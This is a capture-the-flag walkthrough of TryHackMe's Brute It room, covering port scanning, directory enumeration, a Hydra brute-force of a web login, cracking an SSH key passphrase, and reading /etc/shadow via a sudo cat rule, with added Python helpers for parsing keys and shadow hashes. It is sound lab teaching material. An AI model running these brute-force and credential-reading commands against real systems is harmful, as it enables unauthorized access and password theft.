Brute it

September 25, 2025

SSH SUDO


Introduction

This post documents my approach to the Brute It room on TryHackMe, an environment focused on web enumeration, password attacks and Linux privilege escalation, worked from a Kali Linux attack box. The walkthrough follows standard penetration testing methodology: reconnaissance, exploitation, privilege escalation. No actual flags or passwords are shared; placeholders stand in for them where appropriate.


Reconnaissance

Initial recon set the foundation for all subsequent steps. Understanding the attack surface meant collecting key details about running services and exposed endpoints.


Nmap Scan

Default NSE scripts (-sC) and service-version detection (-sV) were run against all 65535 TCP ports (-p-) to discover entry points (UDP was not scanned):

nmap -sC -sV -p- bruteit.thm

Results:

Port  Service  Details
22    SSH      OpenSSH 7.6p1 (Ubuntu)
80    HTTP     Apache 2.4.29 (Ubuntu)

No additional significant ports or services were identified.


Web Enumeration

Using Gobuster, directories were brute-forced to reveal hidden resources:

gobuster dir -u http://bruteit.thm -w /usr/share/wordlists/dirb/common.txt

Key discoveries:

  • /admin (login page)
  • /server-status (403 Forbidden)
  • /index.html (default homepage)

Inspecting the HTML source of /admin revealed a developer comment containing the admin username, which removed the need to guess usernames in the next step.


Exploitation

Brute-forcing Admin Login

With the admin username obtained, Hydra was used to brute-force the web login. The form field names (user, pass) and the failure string were copied from the /admin form and from the error message it returns on a bad login. Hydra's http-post-form module treats any response that does not contain the F= string as a successful login, so the string must match the real error page exactly or the very first guess is reported as valid:

hydra -l admin -P /usr/share/wordlists/rockyou.txt bruteit.thm http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid" -t 4 -w 5 -V

Hydra reported valid credentials:

  • Username: admin
  • Password: <PASSWORD_PLACEHOLDER>

A successful login to the admin panel yielded the web flag:

  • THM{<WEB_FLAG_PLACEHOLDER>}
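The decision rule Hydra applies above is simple, and the failure-string caveat is easiest to see with it written out. The following is an added example, not code from the original post: fake_admin_login is a constructed stand-in for the room's /admin form, and "hunter2" and the four-word wordlist are made-up values, not the room's real credentials or rockyou.txt. The S= (success string) variant is included because it is the safer rule when the error page cannot be captured reliably.

```python
"""Hydra's http-post-form decision rule, spelled out (added example; not code
from the original post). Hydra submits each candidate and declares success the
first time the response body does NOT contain the F= failure string, so a
string that never appears in the real response marks the very first guess as
valid. fake_admin_login is a constructed stand-in for the room's /admin form;
"hunter2" and the wordlist are made-up values, not the room's real ones."""
from typing import Callable, Iterable, Optional

FAILURE_MARKER = "Username or password invalid"   # the F= string used with Hydra


def fake_admin_login(user: str, password: str) -> str:
    """Constructed stand-in for POST /admin/ with user=&pass=; returns the page body."""
    if user == "admin" and password == "hunter2":          # made-up secret
        return "<h1>Welcome, admin</h1><p>THM{example_only}</p>"
    return f"<form action='/admin/' method='post'>...</form><p>{FAILURE_MARKER}</p>"


def brute_force(user: str, candidates: Iterable[str],
                submit: Callable[[str, str], str],
                failure_marker: str,
                success_marker: Optional[str] = None) -> Optional[str]:
    """Return the first candidate Hydra would report, or None if the list is exhausted.

    failure_marker mirrors F=: success means the marker is absent from the body.
    success_marker mirrors S=: when given, success means the marker is present,
    which is the safer rule because a changed or unreachable error page cannot
    fake a post-login page.
    """
    for pw in candidates:
        body = submit(user, pw)
        if success_marker is not None:
            hit = success_marker in body
        else:
            hit = failure_marker not in body
        if hit:
            return pw
    return None


WORDLIST = ["123456", "password", "hunter2", "letmein"]   # constructed, stands in for rockyou.txt


def demo_correct_marker() -> Optional[str]:
    """F= string copied from the real error page: finds the real password."""
    return brute_force("admin", WORDLIST, fake_admin_login, FAILURE_MARKER)


def demo_wrong_marker() -> Optional[str]:
    """F= string with a typo: never present, so the first guess is a false positive."""
    return brute_force("admin", WORDLIST, fake_admin_login, "Login failed")


def demo_success_marker() -> Optional[str]:
    """S= rule: immune to the typo, because it keys on the post-login page."""
    return brute_force("admin", WORDLIST, fake_admin_login, "Login failed",
                       success_marker="Welcome")


if __name__ == "__main__":
    print("correct F=:", demo_correct_marker())   # hunter2
    print("wrong F=:  ", demo_wrong_marker())     # 123456 (false positive)
    print("S=:        ", demo_success_marker())   # hunter2
```

In practice, confirm a Hydra hit by logging in manually: a "found" password on the first line of rockyou.txt is almost always a failure-string problem rather than a weak password.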

Obtaining and Cracking the SSH Key

Inside the admin interface, I discovered a passphrase-protected SSH private key for the user john. The following steps were performed:

  1. Converted the key into a John-compatible hash with ssh2john: ssh2john id_rsa > id_rsa.hash
  2. Cracked the passphrase: john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
  3. Logged in as john, entering the cracked passphrase at the prompt (the key file must be readable only by its owner, or ssh refuses to use it): chmod 600 id_rsa && ssh -i id_rsa john@bruteit.thm
  4. Retrieved the user flag (user.txt):
    • THM{<USER_FLAG_PLACEHOLDER>}
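Before running ssh2john it is worth confirming from the key's own headers that a passphrase is actually set; an unencrypted key works with ssh -i directly and produces nothing useful for John. The code below is an added example, not code from the original post, and it handles both on-disk formats: the legacy PEM form (Proc-Type and DEK-Info headers) and the OpenSSH form, whose base64 body starts with the magic "openssh-key-v1\0" followed by the cipher name, KDF name and KDF options as length-prefixed strings. The sample keys are constructed here (the OpenSSH one is a header-only blob with no key material) and are not the room's id_rsa.

```python
"""Checking whether a private key actually needs cracking before reaching for
ssh2john (added example, not code from the original post). Two on-disk formats:
  * legacy PEM (BEGIN RSA PRIVATE KEY): an encrypted key carries the headers
    "Proc-Type: 4,ENCRYPTED" and "DEK-Info: <cipher>,<iv-hex>";
  * OpenSSH format (BEGIN OPENSSH PRIVATE KEY): the base64 body begins with the
    magic "openssh-key-v1\\0" followed by length-prefixed strings for the cipher
    name, KDF name and KDF options; cipher "none" means the key is unencrypted.
The sample keys are constructed here (the OpenSSH one is a header-only blob with
no key material) and are not the room's id_rsa."""
import base64
import struct
from typing import Any, Dict, Tuple

MAGIC = b"openssh-key-v1\x00"


def _ssh_string(data: bytes) -> bytes:
    """Encode an SSH 'string' (uint32 big-endian length + bytes)."""
    return struct.pack(">I", len(data)) + data


def _read_string(buf: bytes, off: int) -> Tuple[bytes, int]:
    """Decode an SSH 'string' at offset off; returns (value, next offset)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(pem: str) -> Dict[str, Any]:
    """Report format, cipher, KDF and whether a passphrase is needed."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(MAGIC):
            raise ValueError("missing openssh-key-v1 magic")
        cipher, off = _read_string(blob, len(MAGIC))
        kdf, _ = _read_string(blob, off)
        return {"format": "openssh", "cipher": cipher.decode(), "kdf": kdf.decode(),
                "encrypted": cipher != b"none"}
    if header.startswith("-----BEGIN ") and header.endswith("PRIVATE KEY-----"):
        hdrs = {}
        for ln in lines[1:-1]:
            if ":" in ln:                       # base64 never contains ':'
                k, v = ln.split(":", 1)
                hdrs[k.strip()] = v.strip()
        dek = hdrs.get("DEK-Info", "")
        return {"format": "pem", "cipher": dek.split(",")[0] if dek else "none",
                "kdf": "EVP_BytesToKey" if dek else "none",   # OpenSSL's legacy MD5-based KDF
                "encrypted": hdrs.get("Proc-Type", "").endswith("ENCRYPTED")}
    raise ValueError("not a PEM-encoded private key")


def needs_ssh2john(pem: str) -> bool:
    """True when the key is passphrase-protected and therefore worth cracking."""
    return bool(inspect_private_key(pem)["encrypted"])


def build_openssh_header(cipher: str, kdf: str) -> str:
    """Constructed header-only openssh-key-v1 blob (one key slot, no key material)."""
    body = (MAGIC + _ssh_string(cipher.encode()) + _ssh_string(kdf.encode())
            + _ssh_string(b"") + struct.pack(">I", 1))
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + base64.b64encode(body).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed legacy PEM samples; the base64 line is filler, not a key.
LEGACY_ENCRYPTED = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

QUFBQQ==
-----END RSA PRIVATE KEY-----
"""
LEGACY_PLAIN = """-----BEGIN RSA PRIVATE KEY-----
QUFBQQ==
-----END RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for name, pem in [("legacy encrypted", LEGACY_ENCRYPTED), ("legacy plain", LEGACY_PLAIN),
                      ("openssh bcrypt", build_openssh_header("aes256-ctr", "bcrypt")),
                      ("openssh none", build_openssh_header("none", "none"))]:
        print(f"{name:16s} {inspect_private_key(pem)}")
```

The KDF name matters for cracking speed: a modern OpenSSH key uses bcrypt with a configurable round count, so each guess costs far more than against a legacy PEM key, and a wordlist run that finishes in seconds against one can take hours against the other.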

Privilege Escalation

I checked sudo privileges for john:

sudo -l

The output showed that john could run /bin/cat as root without a password (NOPASSWD). Because cat then runs with root's privileges, any file on the system becomes readable, including /etc/shadow:

sudo /bin/cat /etc/shadow

The root user's hash was taken from that output and run through John the Ripper, which recovered the root password; after switching to root with su, the root flag was accessible. Note that the same sudo rule also allows reading /root/root.txt directly with sudo /bin/cat, so cracking the hash is only needed if an interactive root shell is wanted:

  • THM{<ROOT_FLAG_PLACEHOLDER>}
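The shadow output needs a little preparation before John will crack it: the hash field's $id$ prefix tells you the algorithm (and the --format value to pass when John cannot autodetect it), locked or passwordless accounts should be dropped, and John's unshadow tool merges /etc/passwd and /etc/shadow so the hash sits in the passwd line's password column. The code below is an added example, not the original post's code; the passwd and shadow lines are constructed samples with placeholder hashes, not the room's.

```python
"""Handling the output of `sudo /bin/cat /etc/shadow` before it goes to John
(added example, not the original post's code; the passwd and shadow lines are
constructed samples, not the room's).
  * shadow fields: name:hash:lastchg:min:max:warn:inactive:expire:reserved
  * the hash field's "$id$" prefix identifies the algorithm: $1$ md5crypt,
    $5$ sha256crypt, $6$ sha512crypt, $2b$ bcrypt, $y$ yescrypt; '*', '!' or an
    empty field means there is no password hash to crack (locked / no login);
  * John's `unshadow passwd shadow` merges the two files so the hash sits in
    the passwd line's password column, where John also picks up GECOS data
    for its word-mangling rules; that merge is reproduced below."""
from typing import Dict, List, Optional

HASH_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
            "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "y": "yescrypt"}


def hash_algorithm(field: str) -> Optional[str]:
    """Name the crypt algorithm of a shadow hash field; None if nothing to crack."""
    if not field or field[0] in "*!":
        return None
    if field.startswith("$"):
        ident = field.split("$")[1]
        return HASH_IDS.get(ident, f"unknown(${ident}$)")
    return "descrypt"      # traditional 13-character DES crypt has no '$' prefix


def parse_shadow(lines: List[str]) -> Dict[str, str]:
    """Map username -> hash field for every well-formed shadow line."""
    out: Dict[str, str] = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) >= 2:
            out[fields[0]] = fields[1]
    return out


def crackable_targets(shadow_lines: List[str]) -> Dict[str, str]:
    """Accounts that have a real hash, with the algorithm John will need."""
    targets: Dict[str, str] = {}
    for user, field in parse_shadow(shadow_lines).items():
        algo = hash_algorithm(field)
        if algo is not None:
            targets[user] = algo
    return targets


def unshadow(passwd_lines: List[str], shadow_lines: List[str]) -> List[str]:
    """Reproduce `unshadow`: passwd line with its 'x' replaced by the shadow hash."""
    hashes = parse_shadow(shadow_lines)
    merged = []
    for line in passwd_lines:
        fields = line.strip().split(":")
        if len(fields) != 7:          # name:pw:uid:gid:gecos:home:shell
            continue
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


# Constructed sample files. Hash strings are placeholders in the right shape, not real hashes.
PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "john:x:1000:1000:john:/home/john:/bin/bash",
    "sshd:x:110:65534::/run/sshd:/usr/sbin/nologin",
]
SHADOW = [
    "root:$6$SALTSALT$ROOTHASHPLACEHOLDER:18000:0:99999:7:::",
    "john:$6$SALTSALT$JOHNHASHPLACEHOLDER:18000:0:99999:7:::",
    "sshd:*:18000:0:99999:7:::",
    "daemon:!:18000:0:99999:7:::",
]

if __name__ == "__main__":
    print(crackable_targets(SHADOW))        # {'root': 'sha512crypt', 'john': 'sha512crypt'}
    for line in unshadow(PASSWD, SHADOW):   # save these lines and run john --format=sha512crypt on them
        print(line)
```

Only the root line needs cracking here; feeding John the whole merged file wastes time on john's own hash, whose password is already known via the SSH key.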

Post Exploitation & Flags

Flag  Location        Value
Web   Admin panel     THM{<WEB_FLAG_PLACEHOLDER>}
User  user.txt        THM{<USER_FLAG_PLACEHOLDER>}
Root  /root/root.txt  THM{<ROOT_FLAG_PLACEHOLDER>}

Conclusion

Brute It is an excellent exercise in enumeration, web password attacks and Linux privilege escalation. Attention to small clues (an HTML comment holding a username, a NOPASSWD sudo entry for a file-reading binary) and methodical use of standard tools (Gobuster, Hydra, John the Ripper) were what rooted the box. This walkthrough avoids disclosing any sensitive information and serves as a roadmap for those seeking to hone their penetration testing workflow on TryHackMe rooms.


